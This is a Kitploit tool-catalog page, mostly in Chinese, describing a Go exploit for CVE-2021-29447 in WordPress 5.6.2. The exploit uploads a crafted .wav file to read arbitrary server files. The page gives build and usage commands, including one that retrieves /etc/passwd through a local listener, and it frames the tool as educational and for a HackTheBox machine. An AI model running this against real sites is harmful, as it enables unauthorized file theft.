Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
exploit_cve-2021-29447 — Go-based exploit for CVE-2021-29447 targeting WordPress 5.6.2 with PHP 8. Generates a malicious .wav payload to retrieve arbitrary files from the server via media upload, requiring base wp-admin access. | Kitploit
工具/GitHubGitHub/mega8bit/exploit_cve-2021-29447
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

Go-based exploit for CVE-2021-29447 targeting WordPress 5.6.2 with PHP 8. Generates a malicious .wav payload to retrieve arbitrary files from the server via media upload, requiring base wp-admin access.

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
73年前尚未审核

exploit_cve-2021-29447

仅用于教育目的。

此漏洞利用工具旨在方便地从运行 WordPress 5.6.2 和 PHP8 的服务器上获取任何文件。(参见 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

你只需要拥有基础的 wp-admin 访问权限以及上传媒体文件的能力。

该漏洞利用会生成一个 .wav 文件载荷,通过 wp-admin 上传。

然后它会利用漏洞利用的后端服务器,让你在控制台上即时获取文件。

完美适用场景:HackTheBox 的机器 - metatwo https://www.hackthebox.com/machines/metatwo

til

使用/示例

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

下载工具